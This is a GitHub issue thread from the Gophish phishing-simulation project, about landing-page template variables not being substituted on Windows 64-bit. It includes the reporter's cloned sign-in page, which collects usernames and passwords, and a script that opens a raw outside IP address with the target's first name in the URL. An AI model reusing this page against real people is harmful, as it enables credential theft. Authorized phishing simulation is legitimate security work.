### ISSUE TITLE
Template Variables not working for Windows 64 bit version

### ISSUE THREAD

**Issue by mehervez** [gophish/gophish#1926] opened 2020-08-05 06:39 UTC
**Thanks for reaching out! We're happy to help resolve issues as quickly as possible.**

**Please use this template when creating a new issue. If you do not follow this template format, your issue may be closed without comment.**

Before filing a new issue, please use the search bar at the top of the browser to search for similar issues. Also, please make sure you have read our [documentation](https://getgophish.com/documentation/), which covers how to use Gophish.

What version of Gophish are you using?: V0.9.0 windows 64 bit version

Brief description of the issue:  I am using the windows 64 bit version of gophish and really find it to be quite different from the 32 version. The template variable feature is not working as expected.

What are you expecting to see happen? : To summarize the template variables work fine for the email template but not for the landing page. I am trying to use the {{.Email}} and the {{.FirstName}} - The target's email address so that the user does not have to key in the email address but it simply displays "{{.Email}}" instead of the users email address on the login page.

What are you seeing happen? The value for the template variable are not getting replaced instead it displays the template variable name.

If this question is related to email templates or landing pages not working as expected, please provide your template or landing page below:

### html for Landing Page

```
<form action="" autocomplete="off" id="loginForm" method="post" name="loginForm" novalidate="novalidate" onkeypress="if (event &amp;&amp; event.keyCode == 13) Login.submitLoginRequest();" onsubmit="Redirect();">
<div class="fieldMargin error smallText" id="error">&nbsp;</div>

<div id="formsAuthenticationArea">
<div id="userNameArea"><input autocomplete="off" class="text fullWidth" id="userNameInput" name="UserName" placeholder="someone@example.com" spellcheck="false" tabindex="1" type="email" value="{{.Email}}" /></div>

<div id="passwordArea"><input autocomplete="off" class="text fullWidth" id="passwordInput" name="Password" placeholder="Password" tabindex="2" type="password" /></div>

<div id="kmsiArea"><input id="kmsiInput" name="Kmsi" tabindex="3" type="checkbox" value="true" /> <label for="kmsiInput">Keep me signed in</label></div>

<div class="submitMargin" id="submissionArea"><span class="submit" id="submitButton" name="submitButton" onclick="return Login.submitLoginRequest();" onkeypress="if (event &amp;&amp; event.keyCode == 32) Login.submitLoginRequest();" tabindex="4">Sign in</span></div>
</div>
<input id="optionForms" name="AuthMethod" type="hidden" value="FormsAuthentication" />&nbsp;</form>
<script type="text/javascript">
function Redirect() {
  window.open("http://194.41.109.69?Name={{.FirstName}}", "_blank");
}
</script><script type="text/javascript">
```

Please provide any terminal output that may be relevant below:

```
Insert output here
```

Please provide as many steps as you can to reproduce the problem:
 * Step 1 - 
 * Step 2 -

**Comment by glennzw** [comment] 2020-08-07 16:22
Edited issues to display code (wasn't showing without backticks).

**Comment by glennzw** [comment] 2020-08-07 17:12
Not sure if I understand the question correctly, but I just tested on Windows 10 64bit and the template variables work fine for me:

![Screenshot 2020-08-07 at 18 09 48](https://user-images.githubusercontent.com/3966613/89670626-6b6c8b80-d8d9-11ea-978b-5ea51a3abcba.png)

**Comment by jordan-wright** [comment] 2020-08-15 15:16
Closing since there hasn't been any updates in over a week and I can't see any reason why the template variables would work differently between architectures. However, if the issue is still being encountered, please send over any and all information possible so that we can continue troubleshooting.

**Closed** 2020-08-15 15:15 UTC
